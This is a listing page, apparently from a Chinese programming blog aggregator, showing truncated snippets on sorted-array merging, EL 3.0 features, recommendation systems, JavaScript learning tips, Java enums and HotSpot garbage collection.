Given two sorted integer arrays nums1 and nums2, merge nums2 into nums1 as one sorted array. Note:You may assume that nums1 has enough space (size that is
Expression Language 3.0新特性 jinnianshilongnian el 3.0
Expression Language 3.0表达式语言规范最终版从2013-4-29发布到现在已经非常久的时间了；目前如Tomcat 8、Jetty 9、GlasshFish 4已经支持EL 3.0。新特性包括：如字符串拼接操作符、赋值、分号操作符、对象方法调用、Lambda表达式、静态字段/方法调用、构造器调用、Java8集合操作。目前Glassfish 4/Jetty实现最好，对大多数新特性
超越算法来看待个性化推荐 liyonghui160com 超越算法来看待个性化推荐
一提到个性化推荐，大家一般会想到协同过滤、文本相似等推荐算法，或是更高阶的模型推荐算法，百度的张栋说过，推荐40%取决于UI、30%取决于数据、20%取决于背景知识，虽然本人不是很认同这种比例，但推荐系统中，推荐算法起的作用起的作用是非常有限的。就像任何
写给Javascript初学者的小小建议 pda158 JavaScript
　　一般初学JavaScript的时候最头痛的就是浏览器兼容问题。在Firefox下面好好的代码放到IE就不能显示了，又或者是在IE能正常显示的代码在firefox又报错了。　　如果你正初学JavaScript并有着一样的处境的话建议你：初学JavaScript的时候无视DOM和BOM的兼容性，将更多的时间花在了解语言本身（ECMAScript）。只在特定浏览器编写代码（Chrome/Fi
Java 枚举 ShihLei java enum 枚举
注：文章内容大量借鉴使用网上的资料，可惜没有记录参考地址，只能再传对作者说声抱歉并表示感谢！一基础 1）语法枚举类型只能有私有构造器（这样做可以保证客户代码没有办法新建一个enum的实例）枚举实例必须最先定义 2）特性 &nb
Java SE 6 HotSpot虚拟机的垃圾回收机制 uuhorse java HotSpot GC 垃圾回收 VM
官方资料，关于Java SE 6 HotSpot虚拟机的garbage Collection，非常全，英文。 http://www.oracle.com/technetwork/java/javase/gc-tuning-6-140523.html Java SE 6 HotSpot[tm] Virtual Machine Garbage Collection Tuning &

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他